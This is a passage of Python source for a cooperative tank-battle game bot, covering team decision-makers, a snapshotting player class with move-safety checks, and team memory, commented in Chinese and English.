teammateAction = returnActions[ teammateIdx ] if (Action.is_move(teammateAction) # 确保队友动作为移动 and teammate.has_status(Status.KEEP_ON_MARCHING) # 队友正在行军 ): # 尝试模拟下一回合的队友状态,并让队友重新决策,查看他的状态 with map_.simulate_one_action(teammate, teammateAction): action4, _ = teammate.make_decision() if (teammate.has_status(Status.WAIT_FOR_MARCHING) and teammate.has_status(Status.PREVENT_BEING_KILLED) ): # 这个时候队友被阻拦 teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: _shouldBreakBrick = True # 如果是因为对面墙的坦克在阻拦,那么马上破墙''' # # 如果遇到对手准备和队友对射 5cd364e4a51e681f0e921e7a # 那么考虑直接破墙 # # 敌方当前回合应该必定会还击,否则就失去了防御的意义 # 于是,随后就会遇到二对一且三方均没有炮弹 # 如果对方下回合不走,那么二打一直接干掉 # 如果对方下回合移动,那么攻击的队友就解除了威胁,可以继续前进 # if (not teammate.has_status(Status.DEFENSIVE) and teammate.has_status(Status.ENCOUNT_ENEMY) and teammate.has_status(Status.READY_TO_FIGHT_BACK) ): teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() if teammateRiskyEnemyBattler 
class BackToHelpTeamDecision(TeamDecisionMaker):
    """
    Back away from a wall standoff to help a withdrawing teammate.
    5cea650cd2337e01c7ad8de4

    Retreating from the brick can create a two-on-one situation in our favor.

    TODO:
      backing away might itself trigger a WITHDRAW situation?
    """
    def _make_decision(self):
        team = self._team
        map_ = team._map
        Tank2Player = type(team.players[0])  # resolve the player class without importing it
        returnActions = [ player.get_current_decision() for player in team.players ]

        for player in team.players:
            action = player.get_current_decision()
            if player.has_team_decision() or player.defeated:
                continue  # never override an existing team decision or a dead player
            teammate = player.teammate
            teammateBattler = teammate.battler
            if (player.has_status(Status.HAS_ENEMY_BEHIND_BRICK)     # I am in a wall standoff
                and teammate.has_status(Status.WITHDRAW)             # teammate is withdrawing
                and teammate.has_status(Status.ENCOUNT_ENEMY)        # teammate met an enemy
                and (teammate.has_status(Status.READY_TO_FIGHT_BACK) # teammate keeps exchanging fire,
                    or teammate.has_status_in_previous_turns(Status.READY_TO_FIGHT_BACK, turns=1)
                    )
                    # TODO:
                    #   maybe a dedicated "shoot-out" status should describe the
                    #   exchange of fire while withdrawing?
                ):
                battler = player.battler
                oppBattler = player.get_risky_enemy()
                if oppBattler is None: # 5cee87fc641dd10fdcc91b44 why a null pointer here???
                    continue
                oppPlayer = Tank2Player(oppBattler)
                teammateRiskyEnemyTank = oppPlayer.teammate.tank # teammate of the enemy standing off with me
                # NOTE(review): `oppBattler is not None` is always true here (the
                # None case already hit `continue` above) — looks redundant; confirm.
                if oppBattler is not None and teammateRiskyEnemyTank is not None: # should not happen?
                    backAwayAction = battler.back_away_from(oppBattler)
                    _shouldBackAway = False
                    # Simulate stepping backwards until the teammate's threat comes
                    # into range; every simulated step is reverted afterwards.
                    with map_.auto_revert() as counter:
                        while map_.is_valid_move_action(battler, backAwayAction):
                            map_.single_simulate(battler, backAwayAction)
                            counter.increase()
                            if teammateRiskyEnemyTank in battler.get_enemies_around():
                                _shouldBackAway = True
                                break
                    if _shouldBackAway:
                        with player.create_snapshot() as manager:
                            action3, signal3 = player.make_decision(Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK)
                            if Signal.is_break(signal3):
                                continue
                            if signal3 == Signal.READY_TO_BACK_AWAY_FROM_BRICK:
                                returnActions[player.id] = action3
                                player.set_team_decision(action3)
                                continue

        return returnActions
class CutThroughMidlineTeamDecision(TeamDecisionMaker):
    """
    When one of our players is in a wall standoff with an enemy and has no
    choice but to wait, consider shooting through the midline brick instead,
    since that may disturb the other enemy's attacking route.
    """
    def _make_decision(self):
        team = self._team
        map_ = team._map
        base = map_.bases[team.side]
        Tank2Player = type(team.players[0])  # resolve the player class without importing it
        returnActions = [ player.get_current_decision() for player in team.players ]

        for player in team.players:
            #
            # To be safe, wait one turn first?
            #
            # TODO:
            #   this might lose tempo! 5ced7ce1641dd10fdcc776b1
            #   this version is the correct one 5ced7d66641dd10fdcc777ae
            #
            # if not player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1):
            #     continue
            with outer_label() as OUTER_CONTINUE:
                action = player.get_current_decision()
                tank = player.tank
                battler = player.battler
                if player.has_team_decision() or player.defeated:
                    continue  # never override an existing team decision or a dead player
                if (Action.is_stay(action)                                # currently waiting
                    and player.has_status(Status.HAS_ENEMY_BEHIND_BRICK)  # because of an enemy behind a brick
                    and player.has_status(Status.WAIT_FOR_MARCHING)       # hence waiting to march
                    and battler.canShoot                                  # must be able to shoot
                    and battler.is_near_midline()                         # only players near the midline qualify
                    ):
                    _oppBattler = player.get_risky_enemy()
                    _oppPlayer = Tank2Player(_oppBattler)
                    oppPlayer = _oppPlayer.teammate  # the actually considered enemy is its teammate!
                    oppBattler = oppPlayer.battler
                    oppTank = oppBattler.tank
                    if oppPlayer.defeated: # that enemy already lost, nothing to disturb
                        continue
                    # Aim one cell toward our own base side (i.e. across the midline).
                    x1, y1 = battler.xy
                    dx = np.sign( base.x - x1 )
                    x2 = x1 + dx
                    y2 = y1
                    shootAction = Action.get_shoot_action(x1, y1, x2, y2)
                    if battler.will_destroy_a_brick_if_shoot(shootAction): # the shot destroys a brick
                        field = battler.get_destroyed_fields_if_shoot(shootAction)[0]
                        #
                        # First check whether this shot would stop the enemy's move
                        #
                        enemyAttackingRoute = oppBattler.get_shortest_attacking_route()
                        oppAction = oppBattler.get_next_attacking_action(enemyAttackingRoute)
                        oppRealAction = oppPlayer.try_make_decision(oppAction)
                        if (Action.is_move(oppAction)
                            and Action.is_stay(oppRealAction)
                            and oppPlayer.get_risky_enemy() is battler
                            ): # the enemy wants to march next turn but is already halted by our tank
                            continue # then leave things as they are
                        #
                        # Check whether the destroyed brick lies on the enemy's attacking route
                        #
                        _dx = np.sign( base.x - field.x )
                        # First check whether the brick sits on the other side of the map;
                        # _dx == 0 means the brick is on the x = 4 midline and may be destroyed
                        if _dx != 0 and _dx != dx:
                            if field.xy in enemyAttackingRoute:
                                continue # better not destroy this brick?
                        #
                        # Prevent the enemy from suddenly appearing in front of `field`
                        # right after we destroy the brick
                        #
                        for enemyMoveAction in oppBattler.get_all_valid_move_actions():
                            with map_.simulate_multi_actions((battler, shootAction), (oppBattler, enemyMoveAction)):
                                if oppBattler.destroyed: # well, this case still has to be handled ...
                                    continue
                                for enemy in oppBattler.get_enemies_around():
                                    if enemy is tank:
                                        raise OUTER_CONTINUE
                        #
                        # Now the shot is safe to take
                        #
                        player.set_status(Status.READY_TO_CUT_THROUGH_MIDLINE)
                        returnActions[player.id] = shootAction
                        player.set_team_decision(shootAction)

        return returnActions
考虑这样一种情况,当前两个队友进攻路线长度相同,两者下一步同时攻击一个块,假如让其中一个坦克停止攻击 在下回合可以得到更加短的进攻路线,那么就让这个队员暂时停下来。这种情况通常对应着最后拆基地的几步,一个队员 暂时停下来,让另一个队员拆到前面的墙,然后他下回合马上可以打掉基地,最短路线长度是 2 , 如果双方此时是同时开火的,那么最短路线长度是 3 2. 假设一个队友这回合打掉墙,另一个队友下回合可以到达这个队友身后,下回合前面的队友闪避,后面的队友射击, 那么最短路线长度是 2 ,如果此时前一个队员等待一回合,后面的队员将无法射击,那么最短路线长度将是 3 """ IS_MIDDLE_FIRST = True # 优先中路搜索 IS_X_AXIS_FIRST = True # 优先 x-轴优先搜索 def _find_cooperative_solution(self, attackingPlayer, assistantPlayer): """ 给定 attackingPlayer 和 assistantPlayer ,尝试寻找一种最短的进攻路线 如果有个可行的方案,那么只返回找到的第一个 Return: - solution (attackingPlayer, route, realAction, assistantPlayer, shootAction) / None """ team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] IS_MIDDLE_FIRST = self.__class__.IS_MIDDLE_FIRST IS_X_AXIS_FIRST = self.__class__.IS_X_AXIS_FIRST attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler for route in attackingBattler.get_all_shortest_attacking_routes(delay=1, middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): for shootAction in assistantBattler.get_all_valid_shoot_actions(): destroyedFields = assistantBattler.get_destroyed_fields_if_shoot(shootAction) if len(destroyedFields) == 1: field = destroyedFields[0] if isinstance(field, BrickField) and field.xy in route: # 拆到了一个队友进攻路线上的土墙 # # 首先考虑打掉的是不是同一个块 # # 打掉同一个块的情况下,当且仅当攻击方已经面向对方基地时有效,否则起不到增加长度的效果 # attackAction = attackingBattler.get_next_attacking_action(route) if Action.is_shoot(attackAction): destroyedFields2 = attackingBattler.get_destroyed_fields_if_shoot(attackAction) if len(destroyedFields2) == 1 and destroyedFields2[0] is field: # 打掉的是同一个块 if not attackingBattler.on_the_same_line_with(oppBase, ignore_brick=True): continue # 只有当攻击方面对对方基地时,才能起到减少路线长度的效果 else: # 否则可以让攻击方这回合等待 realAction = Action.STAY return (attackingPlayer, route, realAction, assistantPlayer, shootAction) realAction = attackingPlayer.try_make_decision(attackAction) if not Action.is_stay(realAction): return (attackingPlayer, route, realAction, assistantPlayer, shootAction) # 
找不到,返回 None return None def _make_decision(self): team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 不是两个人就不需要考虑合作了 return returnActions elif ( not player1.battler.is_in_enemy_site(include_midline=True) or not player2.battler.is_in_enemy_site(include_midline=True) ): # 两者必须同时在对方基地,并且是严格的不包含中线 # # 条件放宽了,现在允许包含中线 5cec9e9d641dd10fdcc60783 # return returnActions elif ( player1.has_status(Status.ENCOUNT_ENEMY) or player2.has_status(Status.ENCOUNT_ENEMY) or player1.has_status(Status.WAIT_FOR_MARCHING) or player2.has_status(Status.WAIT_FOR_MARCHING) or player1.has_status(Status.PREVENT_BEING_KILLED) or player2.has_status(Status.PREVENT_BEING_KILLED) ): # 不可以拥有和敌人遭遇战斗相关的状态 return returnActions IS_MIDDLE_FIRST = self.__class__.IS_MIDDLE_FIRST IS_X_AXIS_FIRST = self.__class__.IS_X_AXIS_FIRST # # 不需要判断是否具有团队信号? # # 事实上他碰巧提供了一个很好的案例 5cec9157641dd10fdcc5f30d # 最后一步的时候由于覆盖了 READY_TO_LEAVE_TEAMMATE 的团队策略,使得最后一步合作得以顺利实现! # solutions = [] # -> [ (attackingPlayer, route, realAction, assistantPlayer, shootAction) ] for attackingPlayer, assistantPlayer in [ (player1, player2), (player2, player1) ]: attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler if not assistantBattler.canShoot: # 当前回合不能进攻,那就无法发起协助了 ... 
continue _route1 = attackingBattler.get_shortest_attacking_route() _route2 = assistantBattler.get_shortest_attacking_route() minRouteLength = min(_route1.length, _route2.length) # # 攻击方进攻路线长度比辅助方长 2 步以上,那么直接跳过 #-------------------------------------------------------- # 因为单回合决策下至多可以让一个队员的路线长度减 2,如果进攻方比辅助方的攻击路线长 2 步以上,那么 # 一回合内无论如何都不可能让进攻方的路线长度短于辅助方当前回合的最短路线长度,在这种情况下即使可以 # 发生合作,也是没有意义的,甚至可能拖延辅助方的进攻节奏(但是并不能排除可以多回合帮助,然而这个情况 # 非常复杂,所以在此不考虑了) # if _route1.length - _route2.length >= 2: continue solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append(solution) with map_.auto_revert() as counter: # # 现在往后模拟两回合 5ce8db66d2337e01c7ab9fae # # 第一步随便攻击,第二步按照正常的攻击方向,第三步看是否有合适的攻击路线 # _cachedActions = set() # 缓存已经尝试过的第一步两个方向 for route1 in attackingBattler.get_all_shortest_attacking_routes(delay=1, middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): # 攻击方第一步允许 delay = 1 action1 = attackingBattler.get_next_attacking_action(route1) realAction1 = attackingPlayer.try_make_decision(action1) if Action.is_stay(realAction1): continue for route2 in assistantBattler.get_all_shortest_attacking_routes(middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): action2 = assistantBattler.get_next_attacking_action(route2) realAction2 = assistantPlayer.try_make_decision(action2) if Action.is_stay(realAction2): continue key = (action1, action2) if key in _cachedActions: continue _cachedActions.add(key) with map_.auto_revert() as counter: ## 模拟两步 ## map_.multi_simulate((attackingBattler, action1), (assistantBattler, action2)) counter.increase() # 模拟两步找到路线 solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append( (attackingPlayer, route1, action1, assistantPlayer, action2) ) continue ## 模拟三步 ## action11 = attackingBattler.get_next_attacking_action() action22 = assistantBattler.get_next_attacking_action() map_.multi_simulate((attackingBattler, action11), 
(assistantBattler, action22)) counter.increase() # 模拟三步找到路线 solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append( (attackingPlayer, route1, action1, assistantPlayer, action2) ) continue if len(solutions) > 0: solutions.sort(key=lambda tup: tup[1].length) for attackingPlayer, route, realAction, assistantPlayer, shootAction in solutions: attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler returnActions[attackingBattler.id] = realAction returnActions[assistantBattler.id] = shootAction attackingPlayer.set_current_attacking_route(route) attackingPlayer.set_current_decision(realAction) attackingPlayer.set_team_decision(realAction) assistantPlayer.set_current_decision(shootAction) assistantPlayer.set_team_decision(shootAction) assistantPlayer.set_status(Status.HELP_TEAMMATE_ATTACK) break return returnActions #{ END 'decision/team/cooperative_attack.py' }# #{ BEGIN 'decision/team/dummy_ending.py' }# class TeamDecisionDummyEnding(TeamDecisionMaker): """ 用于结束 DecisionChain 的结尾 """ def is_handled(self, result): """ 返回 True ,这样 DecisionChain 就会结束 """ return True def make_decision(self): """ 将 player 缓存的结果直接返回 """ team = self._team player1, player2 = team.players action1 = player1.get_current_decision() action2 = player2.get_current_decision() return [ action1, action2 ] #{ END 'decision/team/dummy_ending.py' }# #{ BEGIN 'player.py' }# class Player(DecisionMaker): # 不能处理的情况,返回 Action.INVALID #------------------------------------ # 值得注意的是,由于 Player 仅仅被 team 判断,signal 仅用于玩家与团队间交流,因此团队在判断时, # 不考虑玩家返回的信号,尽管玩家实际返回的值是 (action, signal) # UNHANDLED_RESULT = Action.INVALID def __init__(self, *args, **kwargs): if __class__ is self.__class__: raise NotImplementedError class Tank2Player(Player): _instances = {} # { (side, id): instance } def __new__(cls, tank, map=None, **kwargs): """ 以 (side, id) 为主键,缓存已经创建过的玩家类,使之为 Singleton Input: - tank TankField/BattleTank 第一次必须是 TankField ,之后随意 - map 
Tank2Map """ key = (tank.side, tank.id) # 只要有这两个属性就可以 obj = __class__._instances.get(key) if obj is None: map_ = map if map_ is None: raise ValueError("map is required at first initialization") if not isinstance(tank, TankField): raise TypeError("tank must be a TankField object at first initialization") obj = object.__new__(cls, **kwargs) __class__._instances[key] = obj obj._initialize(tank, map_) # 使用自定义初始化条件初始化 return obj def __init__(self, tank, map=None): pass def _initialize(self, tank, map): self._tank = tank self._map = map self._battler = BattleTank(tank, map) self._team = None # Tank2Team self._teammate = None # Tank2Player self._opponents = None # [Tank2Player, Tank2Player] self._status = set() # 当前回合的状态,可以有多个,每回合情况 self._labels = set() # 对手给我做的标记,标记后长期有效 self._riskyEnemy = None # 缓存引起潜在风险的敌人 BattleTank self._currentRoute = None # 缓存这回合的攻击路线。这个属性加入较早,只缓存了 marching 逻辑下的路线 self._currentDecision = None # 缓存决策结果,注:每调用一次 make_decision 就会自动修改一次这个结果 self._teamDecision = None # 缓存团队策略 class _SnapshotManager(object): """ 用于管理 player 还原点的创建、选择回滚等行为 --------------------------------------------- 可以为 player 在决策过程中产生的临时变量创建快照,如果在此后又进行了重新决策,但是又不想让这个 决策修改之前决策时留下的临时变量,那么就可以在新的决策前先通过这个类创建一个快照,结束后再通过快照 进行回滚。 关于还原点的创建 ---------------- 1. 对于可能被修改地址指向内存的属性,需要创建一个深拷贝,例如 set, list 类型的属性 2. 对于只是储存引用的属性,那么此处只需要复制引用。这对于采用单例模式设计的类的实例来说是必须的 3. 
对于不可变对象,只需进行简单的值复制 """ MUTABLE_ATTRIBUTES = ( "_status", "_labels" ) IMMUTABLE_ATTRIBUTES = ( "_currentDecision", "_teamDecision" ) REFERENCE_ATTRIBUTES = ( "_currentRoute", "_riskyEnemy" ) TEMPORARY_ATTRIBUTES = MUTABLE_ATTRIBUTES + IMMUTABLE_ATTRIBUTES + REFERENCE_ATTRIBUTES def __init__(self): self._snapshot = None self._discarded = False # 是否废弃当前快照,让 player 的状态永久改变 def create_snapshot(self): """ 创建一个快照 由于决策时可能还会更改敌人的状态,所以实际上是给所有人创建快照 """ snapshot = self._snapshot = {} # (side, id) -> attributes for _key, player in Tank2Player._instances.items(): cache = snapshot[_key] = {} for attr, value in player.__dict__.items(): if attr in self.__class__.MUTABLE_ATTRIBUTES: cache[attr] = deepcopy(value) # 创建深拷贝 elif attr in self.__class__.IMMUTABLE_ATTRIBUTES: cache[attr] = value # 复制值 elif attr in self.__class__.REFERENCE_ATTRIBUTES: cache[attr] = value # 复制引用 def restore(self): """ 恢复到还原点的状态 """ if self._discarded: # 保存更改的情况下,不再回滚 return snapshot = self._snapshot for _key, player in Tank2Player._instances.items(): cache = snapshot[_key] for attr in self.__class__.TEMPORARY_ATTRIBUTES: player.__dict__[attr] = cache[attr] def discard_snapshot(self): """ 是否丢弃当前 snapshot,保存变更。 之后如果再调用 restrore,将不会当前 snapshot 还原 player 的状态 """ self._discarded = True def __eq__(self, other): return self.side == other.side and self.id == other.id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.side, self.id, self._tank.x, self._tank.y) def __copy__(self): return self def __deepcopy__(self): # singleton ! 
return self @property def side(self): return self._tank.side @property def id(self): return self._tank.id @property def defeated(self): return self._tank.destroyed @property def tank(self): return self._tank @property def battler(self): return self._battler @property def team(self): return self._team @property def teammate(self): # -> Tank2Player return self._teammate @property def opponents(self): # -> [Tank2Player, Tank2Player] return self._opponents @contextmanager def create_snapshot(self): """ 创建一个还原点,然后该 player 进行决策,决策完成后回滚 """ try: manager = self.__class__._SnapshotManager() manager.create_snapshot() yield manager # 可以选择不接 snapshot except Exception as e: raise e finally: manager.restore() def set_team(self, team): self._team = team def set_teammate(self, player): # -> Tank2Player assert isinstance(player, Tank2Player) and player.side == self.side self._teammate = player def set_opponents(self, opponents): # -> [Tank2Player] for player in opponents: assert isinstance(player, Tank2Player) and player.side != self.side self._opponents = opponents def get_risky_enemy(self): """ 引起预期行为被拒的敌人,因为该敌人有可能在我方采用预期行为的下一回合将我方击杀 """ return self._riskyEnemy # -> BattleTank def set_risky_enemy(self, enemy): self._riskyEnemy = BattleTank(enemy) # 确保为 BattleTank 对象 def get_current_decision(self): # 返回最后一次决策的结果,用于队员间交流 return self._currentDecision def set_current_decision(self, action): # 用于团队设置队员的当前决策 self._currentDecision = action def get_team_decision(self): # 获得当前的团队决策 return self._teamDecision def has_team_decision(self): return ( self._teamDecision is not None ) def set_team_decision(self, action): # 用于团队设置队员的团队决策 self._teamDecision = action def get_current_attacking_route(self): return self._currentRoute def set_current_attacking_route(self, route): self._currentRoute = route def get_status(self): return self._status def set_status(self, *status): # 添加一个或多个状态 for _status in status: self._status.add(_status) def remove_status(self, *status): # 删除一个或多个状态 for _status in 
status: self._status.discard(_status) # remove_if_exists def clear_status(self): # 清除所有状态 self._status.clear() def has_status(self, status): # 是否存在某种状态 return status in self._status def get_labels(self): return self._labels def add_labels(self, *labels): # 添加一个或多个标记 for label in labels: self._labels.add(label) def has_label(self, label): # 是否存在某个标记 return label in self._labels def remove_labels(self, *labels): # 删除一个活多个标记 for label in labels: self._labels.discard(label) def clear_labels(self): # 清楚全部标记 self._labels.clear() def has_status_in_previous_turns(self, status, turns=1): return self._team.has_status_in_previous_turns(self, status, turns=turns) def has_status_recently(self, status, turns): return self._team.has_status_recently(self, status, turns) def get_previous_action(self, back=1): return self._team.get_previous_action(self, back) def get_previous_attacking_route(self): return self._team.get_previous_attcking_route(self) def _is_safe_action(self, action): """ 评估该这个决策是否安全 Return: - issafe bool 安全 """ tank = self._tank map_ = self._map battler = self._battler teammate = map_.tanks[tank.side][1 - tank.id] if not map_.is_valid_action(tank, action): # 先检查是否为有效行为 return False if Action.is_stay(action): return True # 移动情况下有一种可能的风险 #-------------------------- # 1. 需要考虑移动后恰好被对方打中 # 2. 移动后恰好遇到两个敌人,假设当前回合敌人不动 # ------------------------- if Action.is_move(action): oppBattlers = [ _player.battler for _player in self._opponents ] riskFreeOpps = [] for oppBattler in oppBattlers: if not oppBattler.canShoot: # 对手本回合无法射击,则不必担心 riskFreeOpps.append(oppBattler) with map_.simulate_one_action(tank, action): # 提交地图模拟情况 if len( battler.get_enemies_around() ) > 1: # 移动后遇到两个敌人 battler1, battler2 = oppBattlers x1, y1 = battler1.xy x2, y2 = battler2.xy if x1 != x2 and y1 != y2: # 并且两个敌人不在同一直线上 self.set_risky_enemy(battler1) # 随便设置一个? 
return False for oppBattler in oppBattlers: if oppBattler.destroyed: continue elif oppBattler in riskFreeOpps: continue for enemy in oppBattler.get_enemies_around(): if enemy is tank: # 移动后可能会被敌人打中 self.set_risky_enemy(oppBattler) return False # 射击情况下有两种可能的危险 #-------------------------- # 1. 打破一堵墙,然后敌人在后面等着 # 注意区分两个敌人的情况! 5ce92ed6d2337e01c7abf544 # 2. 身边没有闪避的机会,打破一堵墙,对方刚好从旁路闪出来 # 3. 打到队友! 5ce90c6dd2337e01c7abce7a #--------------------------- if Action.is_shoot(action): destroyedFields = battler.get_destroyed_fields_if_shoot(action) if not teammate.destroyed and teammate in destroyedFields: return False # 打到队友当然不安全! with map_.simulate_one_action(battler, action): # 模拟本方行为 # # TODO: # 只模拟一个坦克的行为并不能反映真实的世界,因为敌方这回合很有可能射击 # 那么下回合它就无法射击,就不应该造成威胁 # for oppTank in map_.tanks[1 - tank.side]: if oppTank.destroyed: continue oppBattler = BattleTank(oppTank) for oppAction in oppBattler.get_all_valid_move_actions(): # 任意移动行为 with map_.simulate_one_action(oppBattler, oppAction): # 模拟敌方行为 for field in destroyedFields: if field.xy == oppTank.xy: break # 对方下一步不可能移动到我即将摧毁的 field 上,所以这种情况是安全的 else: for enemy in oppBattler.get_enemies_around(): if enemy is tank: # 敌方原地不动或移动一步后,能够看到该坦克 # 还可以尝试回避 actions = battler.try_dodge(oppBattler) if len(actions) == 0: # 无法回避,危险行为 self.set_risky_enemy(oppBattler) return False return True # 默认安全? def try_make_decision(self, action, instead=Action.STAY): """ 用这个函数提交决策 如果这个决策被判定是危险的,那么将提交 instead 行为 """ if not Action.is_valid(action): return instead elif not self._is_safe_action(action): return instead else: return action def is_safe_to_close_to_this_enemy(self, oppBattler): """ 下回合接近某个敌人是否安全? 
--------------------------- 用于双方相遇 (且敌人无法射击),我方试图接近他的时候 这种情况下需要判断周围是否有敌人攻击我 """ tank = self._tank map_ = self._map battler = self._battler if oppBattler.canShoot: # 可以射击,必定不安全,还是检查一下 return False action = battler.move_to(oppBattler) if map_.is_valid_move_action(tank, action): for _oppBattler in [ _player.battler for _player in self._opponents ]: # 找到另一个敌人 if _oppBattler.destroyed: # 输了就不算 continue if _oppBattler is oppBattler: # 排除目前这个敌人 continue if not _oppBattler.canShoot: # 本回合不能攻击的不算 continue # 开始模拟,反正就一架坦克 with map_.simulate_one_action(tank, action): for enemy in _oppBattler.get_enemies_around(): if enemy is tank: # 我方坦克将出现在它旁边,并且它可以射击 self.set_risky_enemy(_oppBattler) return False # 可能被偷袭 else: # 此处判断不会被偷袭 return True else: return False # 不能移动,当然不安全 ... def is_safe_to_break_overlap_by_move(self, action, oppBattler): """ 在不考虑和自己重叠的敌人的情况下,判断采用移动的方法打破重叠是否安全 此时将敌人视为不会攻击,然后考虑另一个敌人的攻击 """ tank = self._tank map_ = self._map battler = self._battler if not map_.is_valid_move_action(tank, action): # 还是检查一下,不要出错 return False # 如果移动后有两个敌人在旁边,那么不能前进 5cd3e7a786d50d05a0082a5d #------------------------------------------- with map_.simulate_one_action(tank, action): if len(battler.get_enemies_around()) > 1: #self._riskyEnemy = ?? return False _oppBattlers = [ _player.battler for _player in self._opponents ] for _oppBattler in _oppBattlers: if _oppBattler.destroyed: # 跳过已经输了的 continue if not _oppBattler.canShoot: # 另一个对手不能射击 continue if _oppBattler is oppBattler: # 不考虑和自己重叠的这个坦克 continue with map_.simulate_one_action(tank, action): # 提交模拟 for enemy in _oppBattler.get_enemies_around(): if enemy is tank: # 不安全,可能有风险 self.set_risky_enemy(_oppBattler) return False else: return True # 否则是安全的 def is_suitable_to_overlap_with_enemy(self, oppBattler): """ 当两者均没有炮弹,然后中间相差一格时,冲上去和敌方坦克重叠是否合适? WARNING: ------------ 1. 该函数仅适用于两者间移动路劲长度为 2 的情况,其他情况不适用 2. 
该函数判定为 False 的情况,表示适合堵路,不适合重叠,但是判定为 False 并不表示一定要冲上去重叠,而是要根据当时的具体情况来判断 """ tank = self._tank map_ = self._map battler = self._battler _route = battler.get_route_to_enemy_by_move(oppBattler) assert _route.length == 2 action = oppBattler.move_to(battler) if map_.is_valid_move_action(oppBattler, action): # # 检查自己所处的位置是否是敌人必经之路 # 如果是,那么就堵路 # originRoute = oppBattler.get_shortest_attacking_route() blockingRoute = oppBattler.get_shortest_attacking_route( # 将我方坦克设为 Steel ignore_enemies=False, bypass_enemies=True) if originRoute.is_not_found(): # 不大可能,但是检查一下 return False if blockingRoute.is_not_found(): # 直接就走不通了,当然非常好啦 return False if blockingRoute.length - originRoute.length > 1: # 认为需要多打破一个以上土墙的情况叫做原路 return False return True # @override def make_decision(self, signal=Signal.NONE): """ 预处理: ------------------ - 清除所有旧有状态 - 清除可能的风险敌人 - 统一处理回复格式 注意: ------------------ - 申明为 _make_decision 过程中的缓存变量,必须在下一次决策前预先清除 """ self.clear_status() # 先清除所有的状态 self._riskyEnemy = None # 清楚所有缓存的风险敌人 res = self._make_decision(signal) if isinstance(res, (tuple, list)) and len(res) == 2: returnSignal = res[1] action = res[0] else: if signal != Signal.NONE: # 说明没有回复团队信号 returnSignal = Signal.UNHANDLED else: returnSignal = Signal.INVALID action = res self._currentDecision = action # 缓存决策 return ( action, returnSignal ) def _make_decision(self, signal): player = self battler = player.battler if player.defeated: player.set_status(Status.DIED) return self.__class__.UNHANDLED_RESULT if not battler.canShoot: player.set_status(Status.RELOADING) if battler.is_face_to_enemy_base(): player.set_status(Status.FACING_TO_ENEMY_BASE) if (not player.has_label(Label.DONT_WITHDRAW) and player.has_label(Label.KEEP_ON_WITHDRAWING) and WithdrawalDecision.ALLOW_WITHDRAWAL ): player.remove_status(Status.AGGRESSIVE, Status.DEFENSIVE, Status.STALEMENT) player.set_status(Status.WITHDRAW) # 先保持着 这个状态 decisions = DecisionChain( LeaveTeammateDecision(player, signal), AttackBaseDecision(player, signal), 
EncountEnemyDecision(player, signal), OverlappingDecision(player, signal), BaseDefenseDecision(player, signal), BehindBrickDecision(player, signal), FollowEnemyBehindBrickDecision(player, signal), WithdrawalDecision(player, signal), ActiveDefenseDecision(player, signal), MarchingDecision(player, signal), ) res = decisions.make_decision() if decisions.is_handled(res): return res return self.__class__.UNHANDLED_RESULT #{ END 'player.py' }# #{ BEGIN 'team.py' }# class Team(DecisionMaker): UNHANDLED_RESULT = [ Action.STAY, Action.STAY ] # 实际上不可能碰到 team 不能决策的情况,否则找谁决策呀 ... def __init__(self, *args, **kwargs): if __class__ is self.__class__: raise NotImplementedError class Tank2Team(Team): def __init__(self, side, player1, player2, map): player1.set_team(self) player2.set_team(self) self._side = side self._map = map self._player1 = player1 self._player2 = player2 self._opponentTeam = None self._memory = {} # 团队记忆 self._previousActions = [] # 历史行为 @property def side(self): return self._side @property def players(self): return [ self._player1, self._player2 ] def load_memory(self, memory): """ botzone 将 data 传入给 team 恢复记忆 """ if memory is None: memory = { "status": [], # [ set(), set() ] 每轮的状态 "labels": [ set(), set() ], # [ set(), set() ] 已有的标记 "previousRoute": [ None, None ] # [ Route, Route ] } self._memory = memory self._player1.add_labels(*memory["labels"][0]) self._player2.add_labels(*memory["labels"][1]) def dump_memory(self): memory = self._memory memory["status"].append([ self._player1.get_status(), self._player2.get_status(), ]) memory["labels"] = [ self._player1.get_labels(), self._player2.get_labels(), ] memory["previousRoute"] = [ self._player1.get_current_attacking_route(), self._player2.get_current_attacking_route(), ] return memory def get_memory(self): return self._memory def set_previous_actions(self, previousActions): """ 由 botzone input 获得的过去动作,可以将其视为一种记忆 """ self._previousActions = previousActions def set_opponent_team(self, team): """ 设置对手团队 Input: - 
team Tank2Team """ assert isinstance(team, self.__class__) self._opponentTeam = team def has_status_in_previous_turns(self, player, status, turns=1): """ 在曾经的一定回合里,某玩家是否拥有某个状态 Input: - player Player 玩家实例,不一定是本队的 - status int 状态编号 - turns int 向前检查多少回合 """ team = player.team memory = team.get_memory() allStatus = memory["status"] if len(allStatus) == 0: return False # TODO: # 还需要判断回合数是否超出一已知回合? for turn in range( len(allStatus) - 1 , len(allStatus) - 1 - turns, -1 ): # 逆序 try: previousStatus = allStatus[turn][player.id] except IndexError: # 可能 allStatus 为空 return False if previousStatus is None: return False elif status not in previousStatus: return False else: return True def has_status_recently(self, player, status, turns): """ 最近的几回合内是否曾经拥有过某个状态 """ team = player.team memory = team.get_memory() allStatus = memory["status"] if len(allStatus) == 0: return False for turn in range( len(allStatus) - 1 , len(allStatus) - 1 - turns, -1 ): try: previousStatus = allStatus[turn][player.id] if status in previousStatus: return True except IndexError: return False else: return False def get_previous_action(self, player, back=1): """ 获得一个玩家的操纵坦克的历史行为 Input: - 